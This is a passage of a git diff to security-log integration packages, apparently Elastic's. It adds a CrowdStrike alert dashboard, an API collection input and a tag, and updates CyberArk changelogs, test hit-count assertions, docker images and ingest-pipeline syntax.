+1143,30 @@ "datasourceStates": { "formBased": { "layers": { - "db75efdc-f99e-44e6-96a4-4a2d509b8e39": { + "4e7a254a-d432-4988-a5cb-3de38f841cc9": { "columnOrder": [ - "340a534e-abeb-424e-b0e9-7f7fec891092", - "e98b9563-cb2a-412f-9360-b55bbb9001fb", - "0381cb47-eb28-4ae7-9dda-80de21332f97" + "91fec88d-308d-4dbd-a1a9-241d26c4f894", + "fed2b0eb-a506-462a-af98-71f79762262e", + "18a23919-ca9b-4787-8eb1-b6fac3faa5b6" ], "columns": { - "0381cb47-eb28-4ae7-9dda-80de21332f97": { + "18a23919-ca9b-4787-8eb1-b6fac3faa5b6": { "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Count of logs", + "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" }, - "340a534e-abeb-424e-b0e9-7f7fec891092": { + "91fec88d-308d-4dbd-a1a9-241d26c4f894": { + "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Top 10 values of trendmicro.event.category", + "label": "Event ID", "operationType": "terms", "params": { "exclude": [], @@ -1077,23 +1175,24 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "0381cb47-eb28-4ae7-9dda-80de21332f97", + "columnId": "18a23919-ca9b-4787-8eb1-b6fac3faa5b6", "type": "column" }, "orderDirection": "desc", - "otherBucket": true, + "otherBucket": false, "parentFormat": { "id": "terms" }, "size": 10 }, "scale": "ordinal", - "sourceField": "trendmicro.event.category" + "sourceField": "event.id" }, - "e98b9563-cb2a-412f-9360-b55bbb9001fb": { + "fed2b0eb-a506-462a-af98-71f79762262e": { + "customLabel": true, "dataType": "date", "isBucketed": true, - "label": "@timestamp", + "label": "Timestamp", "operationType": "date_histogram", "params": { "dropPartials": false, @@ -1104,63 +1203,73 @@ "sourceField": "@timestamp" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d887537f-f1fd-404b-8327-8bf3b0d1fdfe", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset : \"trendmicro.deep_security\" " + "query": "" }, "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, "layers": [ { "accessors": [ - "0381cb47-eb28-4ae7-9dda-80de21332f97" + "18a23919-ca9b-4787-8eb1-b6fac3faa5b6" ], - "layerId": "db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "layerId": "4e7a254a-d432-4988-a5cb-3de38f841cc9", "layerType": "data", "position": "top", - "seriesType": "bar_stacked", + "seriesType": "line", "showGridlines": false, - "splitAccessor": "340a534e-abeb-424e-b0e9-7f7fec891092", - "xAccessor": "e98b9563-cb2a-412f-9360-b55bbb9001fb" + "splitAccessor": "91fec88d-308d-4dbd-a1a9-241d26c4f894", + "xAccessor": "fed2b0eb-a506-462a-af98-71f79762262e" } ], "legend": { "isVisible": true, - "position": "right" + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true } }, "title": "", @@ -1171,24 +1280,30 @@ "hidePanelTitles": false }, "gridData": { - "h": 9, - "i": "b0d62dc8-340c-4335-bc6a-162a9d8492b5", - "w": 48, - "x": 0, - "y": 60 + "h": 15, + "i": "940c98f0-56e7-4e29-88d2-07f160f579cb", + "w": 24, + "x": 24, + "y": 46 }, - "panelIndex": "b0d62dc8-340c-4335-bc6a-162a9d8492b5", - "title": "Timeline of logs count by Trend Micro Event Category", + "panelIndex": "940c98f0-56e7-4e29-88d2-07f160f579cb", + "title": "Alert over Timestamp [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "name": "indexpattern-datasource-layer-a278b2d5-076e-409c-b9ca-2da50d6d0a09", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bbcb4d86-6890-474c-9975-f1476711cfad", "type": "index-pattern" } ], @@ -1197,52 +1312,87 @@ "datasourceStates": { "formBased": { "layers": { - "db75efdc-f99e-44e6-96a4-4a2d509b8e39": { + "a278b2d5-076e-409c-b9ca-2da50d6d0a09": { "columnOrder": [ - "e98b9563-cb2a-412f-9360-b55bbb9001fb", - "ca9e6197-9ec4-4b01-85e0-1cc0efbaf582" + "5e0dee9c-395c-42a3-827b-9b796ecdd625", + "0d2426f2-1b70-47e2-84b2-5f36d948dc98" ], "columns": { - "ca9e6197-9ec4-4b01-85e0-1cc0efbaf582": { + "0d2426f2-1b70-47e2-84b2-5f36d948dc98": { "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Count of logs", + "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" }, - "e98b9563-cb2a-412f-9360-b55bbb9001fb": { - "dataType": "date", + "5e0dee9c-395c-42a3-827b-9b796ecdd625": { + "customLabel": true, + "dataType": "number", "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", + "label": "Confidence", + "operationType": "range", "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" + "includeEmptyRows": false, + "maxBars": "auto", + "ranges": [ + { + "from": 0, + "label": "", + "to": 1000 + } + ], + "type": "histogram" }, "scale": "interval", - "sourceField": "@timestamp" + "sourceField": "crowdstrike.alert.confidence" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "bbcb4d86-6890-474c-9975-f1476711cfad", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset : \"trendmicro.deep_security\" " + "query": "" }, "visualization": { "axisTitlesVisibilitySettings": { @@ -1264,27 +1414,30 @@ "layers": [ { "accessors": [ - "ca9e6197-9ec4-4b01-85e0-1cc0efbaf582" + "0d2426f2-1b70-47e2-84b2-5f36d948dc98" ], - "layerId": "db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "layerId": "a278b2d5-076e-409c-b9ca-2da50d6d0a09", "layerType": "data", "position": "top", - "seriesType": "bar_stacked", + "seriesType": "bar_horizontal", "showGridlines": false, - "xAccessor": "e98b9563-cb2a-412f-9360-b55bbb9001fb" + "xAccessor": "5e0dee9c-395c-42a3-827b-9b796ecdd625" } ], "legend": { "isVisible": true, - "position": "right" + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false }, - "preferredSeriesType": "bar_stacked", + "preferredSeriesType": "bar_horizontal", "tickLabelsVisibilitySettings": { "x": true, "yLeft": true, "yRight": true }, - "valueLabels": "hide" + "valueLabels": "hide", + "valuesInLegend": false } }, "title": "", @@ -1295,101 +1448,123 @@ "hidePanelTitles": false }, "gridData": { - "h": 9, - "i": "4d910743-c246-4636-b806-db0e707f9814", + "h": 17, + "i": "9af8495e-c5fb-4fee-ae54-1fffa46a4401", "w": 48, "x": 0, - "y": 69 + "y": 61 }, - "panelIndex": "4d910743-c246-4636-b806-db0e707f9814", - "title": "Timeline of all logs count", + "panelIndex": "9af8495e-c5fb-4fee-ae54-1fffa46a4401", + "title": "Alert over Confidence [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" } ], "timeRestore": false, - "title": "[Trend Micro] Deep Security Logs Overview", + "title": "[Logs CrowdStrike] Alert", "version": 1 }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-12-20T05:44:13.346Z", + "id": "crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c", + "managed": false, "references": [ { "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "name": "cf48b7df-a51b-4a21-a2f9-c4c05705b5eb:indexpattern-datasource-layer-836a096e-11de-4f16-8dc1-08de3e3a2b2f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57bd2cd7-7ec5-41ae-9133-a1ec722479dc:indexpattern-datasource-layer-b4403946-8fa4-464f-b1e2-17fae6304bb5", "type": "index-pattern" }, { "id": "logs-*", - "name": "afb76ed5-df93-4649-a1d8-ee7586c483dd:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "57bd2cd7-7ec5-41ae-9133-a1ec722479dc:5c9cfcd1-2c7f-493f-86a5-002bcf501fde", "type": "index-pattern" }, { "id": "logs-*", - "name": "813d3531-d392-4310-a30e-255453a47462:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "65de46f1-ebf9-4c15-8306-f3bc3390b1b8:indexpattern-datasource-layer-986a7419-3b29-4812-8f1e-8648d18ce08b", "type": "index-pattern" }, { "id": "logs-*", - "name": "5f13ec5c-aee1-4dde-92df-8cbe0ecaa7e2:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "65de46f1-ebf9-4c15-8306-f3bc3390b1b8:db8d1eab-6c1e-4d8a-9efa-1f7407fc28bf", "type": "index-pattern" }, { "id": "logs-*", - "name": "f2a5a219-78b4-4901-b93b-aefe163b43c6:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "aaa3ce74-8cbd-4e77-837e-cdbd42494339:indexpattern-datasource-layer-6e0f7ac1-eb8d-4a86-be2b-9d2f9d1a2dc1", "type": "index-pattern" }, { "id": "logs-*", - "name": "624b72c2-28f7-4245-89ad-c05025be1614:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "aaa3ce74-8cbd-4e77-837e-cdbd42494339:82644959-ef2b-4640-a0ca-d45036d96764", "type": "index-pattern" }, { "id": "logs-*", - "name": "d5723b06-eb47-4af3-8d87-c70575293831:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "14405add-afa0-4e3f-9efd-1f52fad51027:indexpattern-datasource-layer-3a2c2235-1a9e-4db6-ac43-2f05c6775021", "type": "index-pattern" }, { "id": "logs-*", - "name": "8609ed1c-8415-4912-8ff7-75ca89c9afbc:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "14405add-afa0-4e3f-9efd-1f52fad51027:9040575b-9449-4f08-98ae-116d26ebf28d", "type": "index-pattern" }, { "id": "logs-*", - "name": "6849145b-2219-4b62-a2c1-f6293bf5b6b7:indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "4b2cc8d9-8af6-40d0-a91f-71d717ff1bd4:indexpattern-datasource-layer-a6424e3b-fc6e-460e-8385-5a410a690d34", "type": "index-pattern" }, { "id": "logs-*", - "name": "b0d62dc8-340c-4335-bc6a-162a9d8492b5:indexpattern-datasource-layer-db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "name": "4b2cc8d9-8af6-40d0-a91f-71d717ff1bd4:7f2f6ede-7728-4214-a79c-27931101ec10", "type": "index-pattern" }, { "id": "logs-*", - "name": "4d910743-c246-4636-b806-db0e707f9814:indexpattern-datasource-layer-db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "name": "69f87d85-d0f2-4fb3-9e02-e970098547db:indexpattern-datasource-layer-e83ee069-a761-49ed-878d-c9972e55a388", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_dc90c1e0-1105-4006-87aa-2d84fdf2224d:optionsListDataView", + "name": "69f87d85-d0f2-4fb3-9e02-e970098547db:9a07642d-eec9-4213-b1ae-bb5adbbcf25c", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_c2302e6a-a8ab-4b98-b004-96a12088df42:optionsListDataView", + "name": "940c98f0-56e7-4e29-88d2-07f160f579cb:indexpattern-datasource-layer-4e7a254a-d432-4988-a5cb-3de38f841cc9", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_5cb6c3b4-4c04-494a-9757-3da0089120f0:rangeSliderDataView", + "name": "940c98f0-56e7-4e29-88d2-07f160f579cb:d887537f-f1fd-404b-8327-8bf3b0d1fdfe", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_8f323dd7-18da-44e4-b535-3f7cb3584bf2:optionsListDataView", + "name": "9af8495e-c5fb-4fee-ae54-1fffa46a4401:indexpattern-datasource-layer-a278b2d5-076e-409c-b9ca-2da50d6d0a09", "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9af8495e-c5fb-4fee-ae54-1fffa46a4401:bbcb4d86-6890-474c-9975-f1476711cfad", + "type": "index-pattern" + }, + { + "id": "crowdstrike-security-solution-default", + "name": "tag-ref-crowdstrike-security-solution-default", + "type": "tag" + }, + { + "id": "crowdstrike-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "migrationVersion": { - "dashboard": "8.6.0" - }, - "coreMigrationVersion": "8.6.0" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/crowdstrike/kibana/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750.json index 664067d6b4a..ba8ad70e7d6 100644 --- a/packages/crowdstrike/kibana/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750.json +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750.json @@ -79,7 +79,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n**Crowdstrike** \n\n**[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750)** \n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n**Overview**\n\nThis dashboards shows the overview of currently enabled Crowdstrike Integrations (Falcon and FDR).\n\n", + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n**[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750)** \n\n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n\n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)\n\n[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)\n\n**Overview**\n\nThis dashboards shows the overview of currently enabled Crowdstrike Integrations (Falcon and FDR).\n\n", "openLinksInNewTab": false }, "title": "", diff --git a/packages/crowdstrike/kibana/tag/crowdstrike-security-solution-default.json b/packages/crowdstrike/kibana/tag/crowdstrike-security-solution-default.json new file mode 100644 index 00000000000..e010a0d860e --- /dev/null +++ b/packages/crowdstrike/kibana/tag/crowdstrike-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#D36086", + "description": "Tag defined in package-spec", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-12-20T05:37:55.956Z", + "id": "crowdstrike-security-solution-default", + "managed": false, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/crowdstrike/manifest.yml b/packages/crowdstrike/manifest.yml index 66f3d2b79b7..d7aac1271b3 100644 --- a/packages/crowdstrike/manifest.yml +++ b/packages/crowdstrike/manifest.yml @@ -1,13 +1,13 @@ name: crowdstrike title: CrowdStrike -version: "1.28.1" +version: "1.32.1" description: Collect logs from Crowdstrike with Elastic Agent. type: integration format_version: "3.0.0" categories: [security, edr_xdr] conditions: kibana: - version: "^8.11.0" + version: "^8.12.0" icons: - src: /img/logo-integrations-crowdstrike.svg title: CrowdStrike @@ -34,6 +34,14 @@ screenshots: title: CrowdStrike Overview size: 1535x626 type: image/png + - src: /img/crowdstrike-alert-dashboard.png + title: CrowdStrike Alert + size: 1535x626 + type: image/png + - src: /img/crowdstrike-host-dashboard.png + title: CrowdStrike Host + size: 1535x626 + type: image/png policy_templates: - name: crowdstrike title: CrowdStrike @@ -45,6 +53,75 @@ policy_templates: - type: aws-s3 title: "Collect CrowdStrike Falcon Data Replicator logs (input: aws-s3)" description: "Collecting logs from CrowdStrike Falcon Data Replicator (input: aws-s3)" + - type: cel + title: Collect CrowdStrike logs via API + description: Collecting CrowdStrike logs via API. + vars: + - name: client_id + type: text + title: Client ID + description: Client ID for the CrowdStrike. + multi: false + required: true + show_user: true + - name: client_secret + type: password + title: Client Secret + description: Client Secret for the CrowdStrike. + multi: false + required: true + show_user: true + secret: true + - name: url + type: text + title: URL + description: Base URL of the CrowdStrike API. Defaults to https://api.crowdstrike.com + default: https://api.crowdstrike.com + required: true + show_user: true + - name: token_url + type: text + title: Token URL + description: Token URL of CrowdStrike. + default: https://api.crowdstrike.com/oauth2/token + required: true + show_user: false + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http[s]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- owner: github: elastic/security-service-integrations type: elastic diff --git a/packages/crowdstrike/validation.yml b/packages/crowdstrike/validation.yml index 48078f53c4e..d7d6630184f 100644 --- a/packages/crowdstrike/validation.yml +++ b/packages/crowdstrike/validation.yml @@ -1,5 +1,6 @@ errors: exclude_checks: - SVR00001 # Saved query, but no filter. + - SVR00002 - SVR00004 # Saved search not allowed? - SVR00005 # Kibana version for saved tags. diff --git a/packages/cyberark_pta/changelog.yml b/packages/cyberark_pta/changelog.yml index bb924202189..8e4720b2b39 100644 --- a/packages/cyberark_pta/changelog.yml +++ b/packages/cyberark_pta/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.9.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9399 - version: "1.8.1" changes: - description: Changed owners diff --git a/packages/cyberark_pta/data_stream/events/_dev/test/system/test-tcp-config.yml b/packages/cyberark_pta/data_stream/events/_dev/test/system/test-tcp-config.yml index a18ff7a476b..6a8791195c4 100644 --- a/packages/cyberark_pta/data_stream/events/_dev/test/system/test-tcp-config.yml +++ b/packages/cyberark_pta/data_stream/events/_dev/test/system/test-tcp-config.yml @@ -6,3 +6,5 @@ data_stream: syslog_host: 0.0.0.0 syslog_port: 9514 preserve_original_event: true +assert: + hit_count: 2 diff --git a/packages/cyberark_pta/data_stream/events/_dev/test/system/test-udp-config.yml b/packages/cyberark_pta/data_stream/events/_dev/test/system/test-udp-config.yml index 60732f6d8db..ef7455639aa 100644 --- a/packages/cyberark_pta/data_stream/events/_dev/test/system/test-udp-config.yml +++ b/packages/cyberark_pta/data_stream/events/_dev/test/system/test-udp-config.yml @@ -6,3 +6,5 @@ data_stream: syslog_host: 0.0.0.0 syslog_port: 9514 preserve_original_event: true +assert: + hit_count: 2 diff --git a/packages/cyberark_pta/manifest.yml b/packages/cyberark_pta/manifest.yml index 28b3461ac39..de0895d9166 100644 --- a/packages/cyberark_pta/manifest.yml +++ b/packages/cyberark_pta/manifest.yml @@ -1,9 +1,9 @@ name: cyberark_pta title: Cyberark Privileged Threat Analytics -version: "1.8.1" +version: "1.9.0" description: Collect security logs from Cyberark PTA integration. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "iam"] conditions: kibana: diff --git a/packages/cyberarkpas/_dev/deploy/docker/docker-compose.yml b/packages/cyberarkpas/_dev/deploy/docker/docker-compose.yml index 2d099585e0c..d4c23d6050a 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/docker-compose.yml +++ b/packages/cyberarkpas/_dev/deploy/docker/docker-compose.yml @@ -7,20 +7,17 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/audit/* /var/log/" cyberarkpas-audit-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/audit/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/audit/*.log cyberarkpas-audit-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/audit/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/audit/*.log cyberarkpas-audit-tls: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/audit/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/audit/*.log diff --git a/packages/cyberarkpas/changelog.yml b/packages/cyberarkpas/changelog.yml index a81c46ff4d5..f4784d57d0a 100644 --- a/packages/cyberarkpas/changelog.yml +++ b/packages/cyberarkpas/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.20.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9399 +- version: "2.19.3" + changes: + - description: Clean up null handling, formatting + type: bugfix + link: https://github.com/elastic/integrations/pull/9182 - version: "2.19.2" changes: - description: Changed owners diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-logfile-config.yml b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-logfile-config.yml index ff054650eef..8d1df5b6a92 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-logfile-config.yml +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-logfile-config.yml @@ -7,3 +7,5 @@ data_stream: numeric_keyword_fields: - process.pid - log.syslog.priority +assert: + hit_count: 343 \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tcp-config.yml b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tcp-config.yml index 820456bc236..69ffe017bc4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tcp-config.yml +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tcp-config.yml @@ -5,3 +5,5 @@ data_stream: vars: syslog_host: 0.0.0.0 syslog_port: 9999 +assert: + hit_count: 343 \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tls-config.yml b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tls-config.yml index 10b4f68e038..8009c1a76dc 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tls-config.yml +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tls-config.yml @@ -56,3 +56,5 @@ data_stream: BdcwL671AnnDY3GUxcmX7n8/E4lFwQEf5G4IbKa+/fIm4y4wzkINHYnCeTvVPHUZ rcZR4kw7O4cWsLR4NHJBosUVoaeoCizBB6xLREqISxIZuHKuEcYsRA== -----END RSA PRIVATE KEY----- +assert: + hit_count: 343 \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-udp-config.yml b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-udp-config.yml index 4f2e86af14d..fbf6e26e702 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-udp-config.yml +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-udp-config.yml @@ -5,3 +5,8 @@ data_stream: vars: syslog_host: 0.0.0.0 syslog_port: 9999 +# Do not assert hit count for this input. Locally, the constraint is +# satisfied, but on CI, apparently the UDP input drops too many (>0) +# messages. +# assert: +# hit_count: 343 \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/cyberarkpas/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 09ef693bc24..c1aa10d6b4e 100644 --- a/packages/cyberarkpas/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cyberarkpas/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -13,7 +13,7 @@ processors: - rename: field: message target_field: event.original - if: 'ctx.event?.original == null' + if: ctx.event?.original == null ignore_missing: true # # Parse syslog headers (if any) and extract JSON payload. @@ -75,7 +75,7 @@ processors: # - Syslog header timestamp. Either ISO8601 or legacy MMM dd HH:mm:ss, depending on the syslog format in use. # - Original @timestamp from Filebeat. - date: - if: 'ctx.cyberarkpas.audit.IsoTimestamp != null' + if: ctx.cyberarkpas.audit.IsoTimestamp != null field: cyberarkpas.audit.IsoTimestamp target_field: _tmp.timestamp formats: @@ -115,7 +115,7 @@ processors: value: "failed to parse timestamp field: {{{cyberarkpas.audit.Timestamp}}}: {{{_ingest.on_failure_message}}}" - date: - if: 'ctx._tmp.timestamp == null && ctx._tmp.syslog_ts != null && ctx.event?.timezone == null' + if: ctx._tmp.timestamp == null && ctx._tmp.syslog_ts != null && ctx.event?.timezone == null field: _tmp.syslog_ts target_field: _tmp.timestamp formats: @@ -144,7 +144,7 @@ processors: value: "failed to parse legacy syslog timestamp: {{{_tmp.syslog_ts}}}: {{{_ingest.on_failure_message}}}" - date: - if: 'ctx._tmp.timestamp == null && ctx._tmp.syslog_ts != null && ctx.event?.timezone != null' + if: ctx._tmp.timestamp == null && ctx._tmp.syslog_ts != null && ctx.event?.timezone != null field: _tmp.syslog_ts target_field: _tmp.timestamp timezone: '{{{event.timezone}}}' @@ -187,7 +187,7 @@ processors: description: "Converts CAProperties into an array if necessary" source: > def props = ctx.cyberarkpas?.audit?.CAProperties?.CAProperty; - if (props != null && props instanceof Map) { + if (props instanceof Map) { ctx.cyberarkpas.audit.CAProperties.CAProperty = [ props ]; } @@ -295,7 +295,7 @@ processors: return object.entrySet().stream().collect( Collectors.toMap( e -> to_snake_case(e.getKey()), - e -> e.getValue() instanceof Map? keys_to_snake_case_recursive(e.getValue()) : e.getValue() + e -> e.getValue() instanceof Map ? keys_to_snake_case_recursive(e.getValue()) : e.getValue() ) ); } @@ -348,7 +348,7 